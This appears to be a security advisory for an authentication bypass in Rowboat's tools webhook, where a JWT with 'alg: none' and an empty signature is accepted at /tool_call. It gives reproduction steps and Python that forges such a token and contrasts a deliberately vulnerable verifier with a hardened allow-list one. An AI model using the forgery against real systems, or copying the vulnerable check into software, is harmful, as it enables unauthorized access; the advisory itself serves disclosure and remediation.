Rowboat Labs Rowboat Authentication Bypass Vulnerability in Tools Webhook Component

Vulnerability

An authentication bypass vulnerability has been identified in Rowboat Labs' Rowboat application, in versions up to and including 0.1.67. The issue resides in the tools_webhook component, in the function tool_call of the file apps/experimental/tools_webhook/app.py. A remote, unauthenticated attacker can supply a crafted X-Tools-JWE header: the server's JSON Web Token (JWT) parsing logic does not restrict which signature algorithm a token may declare, so the algorithm named in the attacker-controlled token header decides how (or whether) the signature is checked. An attacker can therefore forge tokens that are accepted without any valid signature and bypass authentication entirely.

Impact

Exploitation of this vulnerability allows an attacker to forge tokens carrying arbitrary claims, including administrative ones, and so impersonate any user or service account, bypass the authentication requirement on the /tool_call endpoint, and execute arbitrary tool calls within the Rowboat environment.

Reproduction

To reproduce this vulnerability, first ensure that the Rowboat tools webhook service is running, typically on port 5000. Then craft a JWT whose header sets 'alg' to 'none', leaving the signature segment empty, so that no signature verification takes place. Send a POST request to the '/tool_call' endpoint with the forged token in the 'X-Tools-JWE' header. The server processes the request without validating the token's signature, granting unauthorized access to the tool call functionality.

Remediation

It is recommended to update the JWT verification logic so that the accepted algorithms are fixed server-side in an explicit allow-list of secure, predefined algorithms, such as HS256 or RS256, rather than taken from the token header, and to reject any token that specifies 'none' (in any casing) or any other algorithm not on that list. After updating, confirm that a token with 'alg' set to 'none' and an empty signature is rejected by the /tool_call endpoint.
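The forged 'alg: none' token from the reproduction steps and the server-side allow-list from the remediation, shown side by side in an added example that is not Rowboat's code and does not reproduce the actual logic of apps/experimental/tools_webhook/app.py. It uses only the Python standard library; the HMAC secret, the token payloads and the two verifier functions are constructed here for illustration.

```python
import base64
import hashlib
import hmac
import json
from typing import Optional

# Constructed for this example: a hypothetical HMAC secret, not a Rowboat value.
SECRET = b"example-shared-secret"

# The verifier decides which algorithms are acceptable; the token never does.
ALLOWED_ALGS = {"HS256"}


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def hs256(signing_input: bytes) -> bytes:
    return hmac.new(SECRET, signing_input, hashlib.sha256).digest()


def make_token(payload: dict, alg: str) -> str:
    """Build a compact JWS. alg="none" yields the unsigned token from the reproduction steps."""
    header = {"alg": alg, "typ": "JWT"}
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    if alg == "none":
        return signing_input + "."  # third (signature) segment is empty
    if alg == "HS256":
        return signing_input + "." + b64url_encode(hs256(signing_input.encode()))
    raise ValueError("unsupported alg for this example")


def _split(token: str):
    """Parse the three segments; return None for anything that is not well-formed."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    try:
        header = json.loads(b64url_decode(parts[0]))
        payload = json.loads(b64url_decode(parts[1]))
    except ValueError:  # covers bad base64, bad UTF-8 and bad JSON
        return None
    if not isinstance(header, dict) or not isinstance(payload, dict):
        return None
    return parts, header, payload


def vulnerable_verify(token: str) -> Optional[dict]:
    """Lets the token's own 'alg' field select the check (constructed to show the bug class)."""
    parsed = _split(token)
    if parsed is None:
        return None
    (h, p, s), header, payload = parsed
    alg = header.get("alg")
    if alg == "none":
        return payload  # signature check skipped because the sender asked for it
    if alg == "HS256":
        if hmac.compare_digest(hs256(f"{h}.{p}".encode()), b64url_decode(s)):
            return payload
    return None


def hardened_verify(token: str) -> Optional[dict]:
    """Allow-list the algorithm server-side and always demand a valid signature."""
    parsed = _split(token)
    if parsed is None:
        return None
    (h, p, s), header, payload = parsed
    if header.get("alg") not in ALLOWED_ALGS:
        return None  # rejects "none" in any casing and every unexpected algorithm
    if not s or not hmac.compare_digest(hs256(f"{h}.{p}".encode()), b64url_decode(s)):
        return None
    return payload


if __name__ == "__main__":
    forged = make_token({"sub": "admin", "tool": "shell"}, "none")
    legit = make_token({"sub": "service-account"}, "HS256")
    print("forged token, vulnerable verifier:", vulnerable_verify(forged))  # payload accepted
    print("forged token, hardened verifier:  ", hardened_verify(forged))    # None
    print("signed token, hardened verifier:  ", hardened_verify(legit))     # payload accepted
```

The string returned by make_token(..., "none") is what the reproduction step places in the X-Tools-JWE header of a POST to /tool_call; the vulnerable verifier accepts it while the hardened one rejects it. The hardened version also rejects a signed token whose payload segment was swapped after signing, because the HMAC is recomputed over the segments actually received.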

Added: Apr 20, 2026, 12:26 PM
Updated: Apr 20, 2026, 12:26 PM

Vulnerability Rating

Custom Algorithm

spread: 0.0
impact: 5.0
exploitability: 8.7
remediation: 0.0
relevance: 6.3
threat: 6.4
urgency: 2.9
incentive: 4.2

Our algorithm analyzes dozens of metrics to generate these eight key vulnerability categories, which are then combined to calculate the overall risk score.